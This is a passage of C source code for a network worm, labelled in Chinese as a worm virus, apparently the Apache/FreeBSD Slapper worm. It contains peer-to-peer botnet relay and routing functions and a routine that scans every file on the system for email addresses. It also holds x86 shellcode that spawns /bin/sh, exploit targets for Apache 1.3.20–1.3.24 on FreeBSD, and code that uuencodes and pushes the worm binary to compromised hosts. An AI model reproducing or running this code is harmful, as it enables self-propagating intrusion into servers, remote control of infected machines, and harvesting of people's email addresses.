apache-

一个C做的儒虫病毒

    if (a == 127 || a == 10 || a == 0) return 0;
    if (a == 172 && b >= 16 && b <= 31) return 0;
    if (a == 192 && b == 168) return 0;
    return 1;
}

void broadcast(char *buf,unsigned long len) {
    unsigned long nics,a;
    if (numlinks == 0 || links == NULL) return;
    a=(numlinks/5);
    if (a > 50) a=50;
    else if (a < 4) a=4;
    if (a > numlinks) a=numlinks;
    nics=rand()%((numlinks-a)+1);
    a+=nics;
    for (;nics<a;nics++) if (!myip || links[nics] != myip) relay(links[nics],buf,len);
}

void broute(unsigned long dest, char *buf,unsigned long len) {
    struct route_rec rc;
    char *str=(char*)malloc(sizeof(struct route_rec)+len+1);
    if (str == NULL) return;
    memset((void*)&rc,0,sizeof(struct route_rec));
    rc.h.tag=0x26;
    rc.h.id=rand();
    rc.h.len=sizeof(struct route_rec)+len;
    rc.h.seq=newseq();
    rc.server=dest;
    rc.hops=5;
    memcpy((void*)str,(void*)&rc,sizeof(struct route_rec));
    memcpy((void*)(str+sizeof(struct route_rec)),(void*)buf,len);
    broadcast(str,sizeof(struct route_rec)+len);
    FREE(str);
}

void syncm(struct ainst *inst,char tag,int id) {
    struct addsrv_rec rc;
    struct next_rec { unsigned long server; } fc;
    unsigned long a,b;
    for (b=0;;b+=700) {
        unsigned long _numlinks=numlinks-b>700?700:numlinks-b;
        unsigned long *_links=links+b;
        unsigned char *str;
        if (b > numlinks) break;
        str=(unsigned char*)malloc(sizeof(struct addsrv_rec)+(_numlinks*sizeof(struct next_rec)));
        if (str == NULL) return;
        memset((void*)&rc,0,sizeof(struct addsrv_rec));
        rc.h.tag=tag;
        rc.h.id=id;
        rc.h.len=sizeof(struct next_rec)*_numlinks;
        memcpy((void*)str,(void*)&rc,sizeof(struct addsrv_rec));
        for (a=0;a<_numlinks;a++) {
            memset((void*)&fc,0,sizeof(struct next_rec));
            fc.server=_links[a];
            memcpy((void*)(str+sizeof(struct addsrv_rec)+(a*sizeof(struct next_rec))),(void*)&fc,sizeof(struct next_rec));
        }
        if (!id) relay(inst->in.sin_addr.s_addr,(void*)str,sizeof(struct addsrv_rec)+(_numlinks*sizeof(struct next_rec)));
        else audp_send(inst,(void*)str,sizeof(struct addsrv_rec)+(_numlinks*sizeof(struct next_rec)));
        FREE(str);
    }
}

void senderror(struct ainst *inst, int id, char *buf2) {
    struct data_rec rc;
    char *str,*buf=strdup(buf2);
    memset((void*)&rc,0,sizeof(struct data_rec));
    rc.h.tag=0x45;
    rc.h.id=id;
    rc.h.seq=newseq();
    rc.h.len=strlen(buf2);
    _encrypt(buf,strlen(buf2));
    str=(char*)malloc(sizeof(struct data_rec)+strlen(buf2)+1);
    if (str == NULL) {
        FREE(buf2);
        return;
    }
    memcpy((void*)str,(void*)&rc,sizeof(struct data_rec));
    memcpy((void*)(str+sizeof(struct data_rec)),buf,strlen(buf2));
    audp_send(&udpclient,str,sizeof(struct data_rec)+strlen(buf2));
    FREE(str);
    FREE(buf);
}



int isgood(char a) {
    if (a >= 'a' && a <= 'z') return 1;
    if (a >= 'A' && a <= 'Z') return 1;
    if (a >= '0' && a <= '9') return 1;
    if (a == '.' || a == '@' || a == '^' || a == '-' || a == '_') return 1;
    return 0;
}

int islisten(char a) {
    if (a == '.') return 1;
    if (a >= 'a' && a <= 'z') return 1;
    if (a >= 'A' && a <= 'Z') return 1;
    return 0;
}

struct _linklist {
    char *name;
    struct _linklist *next;
} *linklist=NULL;

void AddToList(char *str) {
    struct _linklist *getb=linklist,*newb;
    while(getb != NULL) {
        if (!strcmp(str,getb->name)) return;
        getb=getb->next;
    }
    newb=(struct _linklist *)malloc(sizeof(struct _linklist));
    newb->name=strdup(str);
    newb->next=linklist;
    linklist=newb;
}

void cleanup(char *buf) {
    while(buf[strlen(buf)-1] == '\n' || buf[strlen(buf)-1] == '\r' || buf[strlen(buf)-1] == ' ') buf[strlen(buf)-1] = 0;
    while(*buf == '\n' || *buf == '\r' || *buf == ' ') {
        unsigned long i;
        for (i=strlen(buf)+1;i>0;i++) buf[i-1]=buf[i];
    }
}


void ScanFile(char *f) {
    FILE *file=fopen(f,"r");
    unsigned long startpos=0;
    if (file == NULL) return;
    while(1) {
        char buf[2];
        memset(buf,0,2);
        fseek(file,startpos,SEEK_SET);
        fread(buf,1,1,file);
        startpos++;
        if (feof(file)) break;
        if (*buf == '@') {
            char email[256],c,d;
            unsigned long pos=0;
            while(1) {
                unsigned long oldpos=ftell(file);
                fseek(file,-1,SEEK_CUR);
                c=fgetc(file);
                if (!isgood(c)) break;
                fseek(file,-1,SEEK_CUR);
                if (oldpos == ftell(file)) break;
            }
            for (pos=0,c=0,d=0;pos<255;pos++) {
                email[pos]=fgetc(file);
                if (email[pos] == '.') c++;
                if (email[pos] == '@') d++;
                if (!isgood(email[pos])) break;
            }
            email[pos]=0;
            if (c == 0 || d != 1) continue;
            if (email[strlen(email)-1] == '.') email[strlen(email)-1]=0;
            if (*email == '@' || *email == '.' || !*email) continue;
            if (!strcmp(email,"webmaster@mydomain.com")) continue;
            for (pos=0,c=0;pos<strlen(email);pos++) if (email[pos] == '.') c=pos;
            if (c == 0) continue;
            if (!strncmp(email+c,".hlp",4)) continue;
            if (!strncmp(email+c,".gov",4)) continue;
            for (pos=c,d=0;pos<strlen(email);pos++) if (!islisten(email[pos])) d=1;
            if (d == 1) continue;
            AddToList(email);
        }
    }
    fclose(file);
}

void StartScan() {
    FILE *f;
    f=popen("find / -type f","r");
    if (f == NULL) return;
    while(1) {
        char fullfile[MAXPATH];
        memset(fullfile,0,MAXPATH);
        fgets(fullfile,MAXPATH,f);
        if (feof(f)) break;
        while(fullfile[strlen(fullfile)-1]=='\n' ||
            fullfile[strlen(fullfile)-1] == '\r')
            fullfile[strlen(fullfile)-1]=0;
        if (!strncmp(fullfile,"/proc",5)) continue;
        if (!strncmp(fullfile,"/dev",4)) continue;
        if (!strncmp(fullfile,"/bin",4)) continue;
        ScanFile(fullfile);
    }
}

void ViewWebsite(char *http,char *cookie) {
    char *server,additional[256], cookies[1024], location[1024];
    unsigned long j,i;
    struct ainst up;
    char num=0;
    if (!strncmp(http,"http://",7)) server=http+7;
    else server=http;
    for (i=0;i<strlen(server);i++) if (server[i] == '/') {
        server[i]=0;
        num+=1;
        break;
    }
    memset(additional,0,256);
    if (cookie) {
        for (j=0;j<strlen(cookie);j++) if (cookie[j] == ';') {
            cookie[j]=0;
            break;
        }
        sprintf(additional,"Cookie2: $Version=\"1\"\r\nCookie: %s\r\n",cookie);
    }
    if (atcp_connect(&up,server,80) != 0) return;
    if (rand()%2) {
        atcp_sendmsg(&up,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n%s\r\n",server+i+num,server,additional);
    }
    else {
        atcp_sendmsg(&up,"GET /%s HTTP/1.0\r\nHost: %s\r\nAccept: text/html, text/plain, text/sgml, */*;q=0.01\r\nAccept-Encoding: gzip, compress\r\nAccept-Language: en\r\nUser-Agent: Lynx/2.8.4rel.1 libwww-FM/2.14\r\n%s\r\n",server+i+num,server,additional);
    }
    memset(cookies,0,1024);
    memset(location,0,1024);
    while(1) {
        fd_set n;
        struct timeval tv;
        FD_ZERO(&n);
        FD_SET(up.sock,&n);
        tv.tv_sec=60*20;
        tv.tv_usec=0;
        if (select(up.sock+1,&n,(fd_set*)0,(fd_set*)0,&tv) <= 0) break;
        if (FD_ISSET(up.sock,&n)) {
            char buf[4096], *str;
            unsigned long code,i;
            if ((i=recv(up.sock,buf,4096,0)) <= 0) break;
            buf[i]=0;
            str=strtok(buf,"\n");
            while(str && *str) {
                char name[1024], params[1024];
                while(str[strlen(str)-1] == '\r' || str[strlen(str)-1] == '\n') str[strlen(str)-1] = 0;
                for (i=0;i<strlen(str);i++) if (str[i] == ':' || str[i] == '/') break;
                str[i]=0;
                if (strlen(str) < 1024) {
                    strcpy(name,str);
                    if (strlen(str+i+1) < 1024) {
                        if (str[i+1] == ' ') strcpy(params,str+i+2);
                        else strcpy(params,str+i+1);
                        if (!strcmp(name,"HTTP")) code=atoi(params);
                        else if (!strcmp(name,"Set-Cookie")) strcpy(cookies,params);
                        else if (!strcmp(name,"Location")) strcpy(location,params);
                    }
                }
                str=strtok((char*)NULL,"\n");
            }
            if (*location) {
                char *a=strdup(location),*b=strdup(cookies);
                ViewWebsite(a,b);
                FREE(a);
                FREE(b);
            }
        }
    }
}

#ifdef SCAN
#define HOST_PARAM    "Unknown"
#define RET_ADDR_INC    512
#define PADSIZE_1    4
#define PADSIZE_2     5
#define PADSIZE_3    7
#define REP_POPULATOR    24
#define REP_SHELLCODE    24
#define NOPCOUNT    1024
#undef NOP
#define NOP        0x41
#define PADDING_1    'A'
#define PADDING_2    'B'
#define PADDING_3    'C'
#define PUT_STRING(s)    memcpy(p, s, strlen(s)); p += strlen(s);
#define PUT_BYTES(n, b)    memset(p, b, n); p += n;
char shellcode[] =
  "\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50\x50\xc6\x04\x24"
  "\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1\x18\xd1\xea\x31"
  "\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24\x04\x80\x7c\x24"
  "\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44\x24\x04\x20\x89"
  "\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89\x44\x24\x14\x89"
  "\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0\xb0\x5d\xcd\x80"
  "\x31\xc9\xd1\x2c\x24\x73\x27\x31\xc0\x50\x50\x50\x50\xff\x04\x24"
  "\x54\xff\x04\x24\xff\x04\x24\xff\x04\x24\xff\x04\x24\x51\x50\xb0"
  "\x1d\xcd\x80\x58\x58\x58\x58\x58\x3c\x4f\x74\x0b\x58\x58\x41\x80"
  "\xf9\x20\x75\xce\xeb\xbd\x90\x31\xc0\x50\x51\x50\x31\xc0\xb0\x5a"
  "\xcd\x80\xff\x44\x24\x08\x80\x7c\x24\x08\x03\x75\xef\x31\xc0\x50"
  "\xc6\x04\x24\x0b\x80\x34\x24\x01\x68\x42\x4c\x45\x2a\x68\x2a\x47"
  "\x4f\x42\x89\xe3\xb0\x09\x50\x53\xb0\x01\x50\x50\xb0\x04\xcd\x80"
  "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50"
  "\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc";
;

struct {
    char *type;
    int delta;
    u_long retaddr;
    int repretaddr;
    int repzero;
} targets[] = {
        { "FreeBSD 4.5 x86 / Apache/1.3.20 (Unix)",      -146,  0xbfbfde00,6, 36 },
        { "FreeBSD 4.5 x86 / Apache/1.3.22-24 (Unix)",   -134,  0xbfbfdb00,3, 36 },
}, victim;

char *GetAddress(char *ip) {
    struct sockaddr_in sin;
    fd_set fds;
    int n,d,sock;
    char buf[1024];
    struct timeval tv;
    sock = socket(PF_INET, SOCK_STREAM, 0);
    sin.sin_family = PF_INET;
    sin.sin_addr.s_addr = inet_addr(ip);
    sin.sin_port = htons(80);
    if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) return NULL;
    write(sock,"GET / HTTP/1.1\r\n\r\n",strlen("GET / HTTP/1.1\r\n\r\n"));
    tv.tv_sec = 15;
    tv.tv_usec = 0;
    FD_ZERO(&fds);
    FD_SET(sock, &fds);
    memset(buf, 0, sizeof(buf));
    if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
        if(FD_ISSET(sock, &fds)) {
            if((n = read(sock, buf, sizeof(buf) - 1)) < 0) return NULL;
            for (d=0;d<n;d++) if (!strncmp(buf+d,"Server: ",strlen("Server: "))) {
                char *start=buf+d+strlen("Server: ");
                for (d=0;d<strlen(start);d++) if (start[d] == '\n') start[d]=0;
                cleanup(start);
                return strdup(start);
            }
        }
    }
    return NULL;
}

#define    ENC(c) ((c) ? ((c) & 077) + ' ': '`')

int sendch(int sock,int buf) {
    char a[2];
    int b=1;
    if (buf == '`' || buf == '\\' || buf == '$') {
        a[0]='\\';
        a[1]=0;
        b=write(sock,a,1);
    }
    if (b <= 0) return b;
    a[0]=buf;
    a[1]=0;
    return write(sock,a,1);
}

int writem(int sock, char *str) {
    return write(sock,str,strlen(str));
}

int encode(int a) {
    register int ch, n;
    register char *p;
    char buf[80];
    FILE *in;
    if ((in=fopen("/tmp/.a","r")) == NULL) return 0;
    writem(a,"begin 655 .a\n");
    while ((n = fread(buf, 1, 45, in))) {
        ch = ENC(n);
        if (sendch(a,ch) <= ASUCCESS) break;
        for (p = buf; n > 0; n -= 3, p += 3) {
            if (n < 3) {
                p[2] = '\0';
                if (n < 2) p[1] = '\0';
            }